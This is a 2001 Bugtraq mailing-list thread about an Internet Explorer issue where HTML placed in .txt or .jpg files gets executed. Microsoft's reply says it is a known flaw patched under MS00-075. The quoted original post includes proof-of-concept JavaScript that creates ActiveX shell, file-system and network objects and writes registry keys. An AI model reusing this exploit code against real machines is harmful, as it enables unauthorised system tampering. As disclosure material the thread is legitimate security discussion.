RE: TXT or HTML? -- IE NEW BUG

From: Microsoft Security Response Center (secure@microsoft.com)
Date: 07/29/01 

Subject: RE: TXT or HTML? -- IE NEW BUG
Date: Sun, 29 Jul 2001 08:09:59 -0700
Message-ID: <C10F7F33B880B248BCC47DB446738847038F968B@red-msg-07.redmond.corp.microsoft.com>
From: "Microsoft Security Response Center" <secure@microsoft.com>
To: "cr4zybird" <cr4zybird@hotmail.com>, <bugtraq@securityfocus.com>

Hi All -

We investigated this report when we received it on 20 July, and reported
our findings to the author. The short answer is that there doesn't
appear to be anything new here. However, because the report mixes
references to several different issues, it can be difficult to see why
this is.
* The Javascript listing below does indeed exploit a
vulnerability. However, it's a known vulnerablity for which a patch has
been available since October 2000. The issue is discussed in Microsoft
Security Bulletin MS00-075
(http://www.microsoft.com/technet/security/bulletin/MS00-075.asp).
* If script were included within a .txt, .jpg or other file and
hosted on a web site, it could be opened automatically by a page on the
site. However, the script would run in the web page's domain, so it
would be subject to all the same limitations as script on the page
itself. That is, embedding the script within the file wouldn't gain the
attacker any capabilities.
* If a user could be convinced to download a .txt, .jpg or other
file to the desktop and then open it, either of two effects would
result, depending on the file type. Most file types don't open in IE by
default. For instance, .txt files open in Notepad by default. In these
cases, the script in the file wouldn't run. Other file types,
principally image files, do open in IE by default. However, when
they're opened from the local machine, they're sent directly to the
image rendering engine in IE, bypassing the script parser. Once again,
the script wouldn't run.
* Attached files in email are handled the same as downloaded
files. So again, either the file would open by default in a program
other than IE, or would open in a way that bypasses the script
interpreter.

Hope that helps explain the situation. Regards,

Scott Culp
Security Program Manager
Microsoft Security Response Center

-----Original Message-----
From: cr4zybird [mailto:cr4zybird@hotmail.com]
Sent: Friday, July 27, 2001 3:07 PM
To: bugtraq@securityfocus.com
Subject: TXT or HTML? -- IE NEW BUG

TXT or HTML? -- IE NEW BUG

vulnerable programs:

IE4 ,IE5 ,IE5,IE6 ,Microsoft Word ,Microsoft

Excel,Microsoft PowerPoint,

Tencent explorer (I've tested all the versions of IE that

i can find, they

are all vulnerable)

description:

IE doesn't recognize the extensions of files, which

may contain some html

code.

Write a HTML file on NOTEPAD. save it as *.txt.

upload to any server.then

use IE to visit this page.Found: IE excuted the HTML

code which contained in

*.txt files. and we can also change the extension, like

*.jpg or other

non-downloaded files.finally i found that IE can't

recognize the extension

of a file.

using this bug, anyone who knows how to make

webpages can successfully

attack other people. because of user's generic

thought, they think only

.html/.htm can be used to attack, but now,

even .txt.jpg.png can do

everything that a hmtl page can do! even the e-mail

attachment! because

outlook express is vulnerable, too. treat it seriously

please.

Due to the company's not wanting to be responsible

for this bug, please,

take it seriously, and be aware.

here is a source code, just to prove the existence of

this new bug.

<SCRIPT Language="JavaScript"

type="text/javascript">

<!--

document.write("<APPLET HEIGHT=0 WIDTH=0

code=com.ms.activeX.ActiveXComponent></APPLE

T>");

function f(){

try

{

//ActiveX initialization

a1=document.applets[0];

a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-

00C04FD58A0B}");

a1.createInstance();

Shl = a1.GetObject();

a1.setCLSID("{0D43FE01-F093-11CF-8940-

00A0C9054228}");

a1.createInstance();

FSO = a1.GetObject();

a1.setCLSID("{F935DC26-1CF0-11D0-ADB9-

00C04FD58A0B}");

a1.createInstance();

Net = a1.GetObject();

try

{

if (document.cookie.indexOf("Chg") == -1)

{

Shl.RegWrite ("HKLM\\Software\\Microsoft\\Internet

Explorer\\Main\\Window

Title", "it's a good day to die!");

Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet

Explorer\\Main\\Window

Title", "it's a good day to die!");

var expdate = new Date((new Date()).getTime() +

(1));

document.cookie="Chg=general; expires=" +

expdate.toGMTString() + ";

path=/;"

}

}

catch(e)

{}

}

catch(e)

{}

}

function init()

{

setTimeout("f()", 1000);

}

init();

// -->

</SCRIPT>

<img src=http://www.gnu.org/graphics/gnu-head-

sm.jpg>

it's a .jpg which may change your IE title(you have to

change the extension

to *.jpg first)

non-vulnerable programs:

netscape

solutions:

1) download some antivirus softwares. and update

the virus datebase all the

time. and change the name of some 'dangerous'

programs in your system, such

as format.exe deltree.exe etc. i.e change format.exe

to format_0.com etc.

2) try, not to visit those so-

called 'hacker'or'cracking'sites. most of the

time, you are the victim while you want to learn to

attack others.

3) if you have to go visit some site that you are not

quite sure if they are

safe. then check it here first:

http://crazybird.51.net/look.htm

   or you can also save the source code of this page

to your computer, then

save it as *.htm, so you can execute it on your own

comp. be aware if it

says "the web page contains some unsafe ActiveX"

or something like that,

   then you'd better not to execute that ActiveX widget.

and i can't promise

that it can give you this kind of warn for any

aggressive files..

4) DO NOT open your attachment in IE!!!!!don't ever

open any type of file in

IE directly!!!BE AWARE!! you'd better use antivirus

to scan it before you

open it after you've download it to ur computer.

5) Update the system patch immediately if the patch

comes out.

if you still have quesitions, mail to:

cr4zybird@hotmail.com

thanks to: springcream, skywind, nETMONKEY,

xiajian, Nancy. they've gave me

a lot of help on testing and communicatin with

Microsoft

by:

crazybird

cr4zybird@hotmail.com

IRC: irc.sunnet.org 6667

#CNFORCE

26/7/01 China

Relevant Pages

  • FileSeek cgi script advisory
    ... FileSeek cgi script Advisory ... The script is written by Craig Patchett. ... The second vulnerability is a directory transversal bug which let you ...
    (Vuln-Dev)
  • Re: Coldfusion Fusebox V4.1.0 Vulnerability
    ... List of people you could have contacted with regarding the bug: ... Subject: Coldfusion Fusebox V4.1.0 Vulnerability ... to set a standard page for errors and some filter out the script tags. ...
    (Bugtraq)
  • Re: CGI.pm popup_menu questions
    ... et@emilt.com (Emil Tarazi) writes: ... > field in the HTML must be all lowercase (regardless of the case of the ... No quite sure what you are saying bu it sounds like a bug, ... Could you please post a minimal but complete script ...
    (comp.lang.perl.misc)
  • Re: ereg_replace hangs script execution
    ... The script has to generate a document list (very long, resulting HTML ... Why multiple ereg_* invocation makes PHP crash? ... it is not ereg funcionbug, but somethinng in this script is not ok. ...
    (comp.lang.php)
  • Re: MIME::Tools infinite loop
    ... If the HTML comes from a file, the loop happens, but if ... I have a similar script that builds a MIME message using ... No, there is no bug, and you did something wrong. ... but complete* script that demonstrates your problem. ...
    (comp.lang.perl.misc)